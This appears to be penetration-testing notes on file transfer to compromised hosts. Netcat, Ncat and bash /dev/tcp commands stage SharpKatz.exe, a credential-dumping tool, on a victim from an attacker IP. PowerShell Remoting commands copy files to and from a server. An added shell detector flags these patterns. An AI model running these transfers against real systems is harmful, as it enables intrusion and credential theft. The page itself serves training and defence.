File Transfer with Netcat and Ncat
Netcat - Attack Host - Sending File to Compromised Machine
The -q 0 option closes the connection once the transfer has finished.
# Using original netcat
victim$ nc -l -p 8000 > SharpKatz.exe
attacker$ nc -q 0 13.13.13.13 8000 < SharpKatz.exe
Ncat - Attack Host - Sending File to Compromised Machine
# Using Ncat
victim$ ncat -l -p 8000 --recv-only > SharpKatz.exe
attacker$ ncat --send-only 13.13.13.13 8000 < SharpKatz.exe
Sending File as Input to Netcat
attacker$ sudo nc -l -p 443 -q 0 < SharpKatz.exe
victim$ nc 13.13.13.13 443 > SharpKatz.exe
Sending File as Input to Ncat
attacker$ sudo ncat -l -p 443 --send-only < SharpKatz.exe
victim$ ncat 13.13.13.13 443 --recv-only > SharpKatz.exe
Sending File from Attacker Machine to Compromised Machine using /dev/tcp
# Netcat option
attacker$ sudo nc -l -p 443 -q 0 < SharpKatz.exe
# Ncat option
attacker$ sudo ncat -l -p 443 --send-only < SharpKatz.exe
# Connecting to netcat using /dev/tcp
victim$ cat < /dev/tcp/13.13.13.13/443 > SharpKatz.exe
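For the defender's side of the transfers above, an added example (not from the original page): a shell function that tags process command lines matching the nc, ncat and /dev/tcp patterns shown here. The record layout "<host> <user> <command line>" and the rule names are assumptions, and the sample records are constructed.

```shell
#!/bin/sh
# Added example: tag command lines that match the transfer patterns on this page.
# Assumed record layout (one per line): <host> <user> <command line>
# Shell redirections ("> file") are not part of a process argv, so they only
# show up when the whole pipeline was passed as a string, e.g. to "bash -c".

# Constructed sample records, not real telemetry.
sample_log() {
  cat <<'EOF'
web01 www-data nc -l -p 8000
web01 www-data ncat -l -p 8000 --recv-only
db02 root cat /etc/hostname
db02 svc bash -c cat < /dev/tcp/13.13.13.13/443 > SharpKatz.exe
ops01 alice ncat --send-only 13.13.13.13 8000
ops01 alice ssh admin@web01
web01 www-data nc 13.13.13.13 443
EOF
}

# Prints: rule<TAB>host<TAB>user<TAB>command for every matching record.
detect_transfers() {
  awk '
    BEGIN {
      # Binary name at start of the command, or after a space or path slash.
      nc_bin   = "(^|[ /])(nc|ncat|netcat)( |$)"
      ncat_bin = "(^|[ /])ncat( |$)"
      ip_port  = "[0-9]+[.][0-9]+[.][0-9]+[.][0-9]+ +[0-9]+( |$)"
    }
    {
      host = $1; user = $2
      cmd = $0; sub(/^[^ ]+ +[^ ]+ +/, "", cmd)   # drop host and user
      rule = ""
      if (index(cmd, "/dev/tcp/") > 0)
        rule = "bash-dev-tcp"        # bash pseudo-device used as a TCP client
      else if (cmd ~ ncat_bin && cmd ~ /--(send|recv)-only/)
        rule = "ncat-one-way"        # one-directional Ncat transfer
      else if (cmd ~ nc_bin && cmd ~ / (-[a-zA-Z]*l[a-zA-Z]*|--listen)( |$)/)
        rule = "nc-listener"         # netcat waiting for an inbound connection
      else if (cmd ~ nc_bin && cmd ~ ip_port)
        rule = "nc-outbound"         # netcat connecting to a literal IP and port
      if (rule != "") printf "%s\t%s\t%s\t%s\n", rule, host, user, cmd
    }'
}

sample_log | detect_transfers
```

Rules are evaluated in order and the first match wins, so an Ncat listener started with --send-only or --recv-only is reported as ncat-one-way.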
PowerShell Session File Transfer
I covered PowerShell file transfers in the Windows File Transfer section, but there are cases where HTTP, HTTPS and SMB are all unavailable. In those cases we can use PowerShell Remoting, also known as WinRM. It usually listens on TCP/5985 for HTTP and TCP/5986 for HTTPS.
Check TCP 5985 Port on DATABASE01
PS C:\carnifex17> Test-NetConnection -ComputerName DATABASE01 -Port 5985
Create a PowerShell Remoting Session to DATABASE01
PS C:\Desktop> $Session = New-PSSession -ComputerName DATABASE01
Copy samplefile.txt from our Localhost to the DATABASE01 Session
PS C:\Desktop> Copy-Item -Path C:\samplefile.txt -ToSession $Session -Destination C:\Users\Administrator\Desktop\
Copy DATABASE.txt from DATABASE01 Session to our Localhost
PS C:\Desktop> Copy-Item -Path "C:\Users\Administrator\Desktop\DATABASE.txt" -Destination C:\ -FromSession $Session
Last updated 6 months ago